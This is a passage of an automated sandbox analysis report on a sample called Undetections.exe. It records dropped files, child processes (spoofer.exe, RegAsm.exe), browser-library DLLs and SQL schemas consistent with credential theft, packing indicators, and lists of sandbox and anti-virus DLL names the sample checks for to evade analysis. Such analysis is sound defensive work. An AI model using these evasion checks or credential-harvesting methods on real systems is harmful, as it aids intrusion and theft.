                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: KEBGHCBAEGDHIDGCBAEC.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: softokn3[1].dll.4.dr, softokn3.dll.4.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: Undetections.exeVirustotal: Detection: 30%
                          Source: Undetections.exeReversingLabs: Detection: 26%
                          Source: RegAsm.exeString found in binary or memory: t-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.
                          Source: RegAsm.exeString found in binary or memory: 48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.office.co
                          Source: unknownProcess created: C:\Users\user\Desktop\Undetections.exe "C:\Users\user\Desktop\Undetections.exe"
                          Source: C:\Users\user\Desktop\Undetections.exeProcess created: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe "C:\Users\user\AppData\Roaming\Undetections\spoofer.exe"
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\Desktop\Undetections.exeProcess created: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe "C:\Users\user\AppData\Roaming\Undetections\spoofer.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\Undetections.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: Undetections.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: Undetections.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: Undetections.exeStatic file information: File size 1800192 > 1048576
                          Source: Undetections.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x177800
                          Source: Undetections.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000004.00000002.2156275105.000000006F8AD000.00000002.00000001.01000000.00000012.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                          Source: Binary string: freebl3.pdb source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed#fontawesome.sharpQcostura.fontawesome.sharp.dll.compressed source: Undetections.exe
                          Source: Binary string: freebl3.pdbp source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
                          Source: Binary string: C:\projects\fontawesome-sharp\FontAwesome.Sharp\obj\Release\net472\FontAwesome.Sharp.pdb source: Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003941000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4107042182.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003A61000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed source: Undetections.exe
                          Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.4.dr, vcruntime140[1].dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.4.dr, msvcp140.dll.4.dr
                          Source: Binary string: costura.costura.pdb.compressedlBkq source: Undetections.exe, 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nss3.pdb source: RegAsm.exe, 00000004.00000002.2155852883.0000000069DDF000.00000002.00000001.01000000.00000011.sdmp, nss3[1].dll.4.dr, nss3.dll.4.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000004.00000002.2139779376.0000000013747000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2152326943.00000000196B8000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.dr
                          Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000004.00000002.2156275105.000000006F8AD000.00000002.00000001.01000000.00000012.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Undetections.exe
                          Source: Binary string: softokn3.pdb source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Undetections.exe, 00000000.00000002.4104859280.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003E21000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4100226337.0000000003B97000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\7xp79cm1d4qf1g\obj\Release\Beyound.pdb source: spoofer.exe.0.dr

                          Data Obfuscation

                          barindex
                          .NET source code contains potential unpacker
                          Source: Undetections.exe, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Yara detected Costura Assembly Loader
                          Source: Yara matchFile source: Undetections.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Undetections.exe.430000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1639618593.0000000000478000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4082954500.0000000002941000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Undetections.exe PID: 7308, type: MEMORYSTR
                          Source: Undetections.exeStatic PE information: 0xEBAED08E [Wed Apr 20 01:46:54 2095 UTC]
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00418460 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418460
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_05FDF108 push eax; mov dword ptr [esp], edx0_2_05FDF11C
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_05FDE8C8 push eax; ret 0_2_05FDE8D1
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_05FD221F push eax; mov dword ptr [esp], ecx0_2_05FD2231
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_0794A08A push 840704CFh; iretd 0_2_0794A091
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A3B5 push ecx; ret 4_2_0041A3C8
                          Source: spoofer.exe.0.drStatic PE information: section name: .text entropy: 7.991881969921377
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\Undetections.exeFile created: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00418460 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418460
                          Source: C:\Users\user\Desktop\Undetections.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                          Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                          Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                          Source: RegAsm.exe, 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                          Source: C:\Users\user\Desktop\Undetections.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeMemory allocated: CB0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory allocated: 1350000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeCode function: 0_2_0F0F9E38 sldt word ptr [eax]0_2_0F0F9E38
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599808Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599688Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599563Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599445Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599329Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599204Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599079Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598954Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598829Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598704Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598579Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598454Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598329Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598204Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598086Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597969Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597725Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595485Jump to behavior
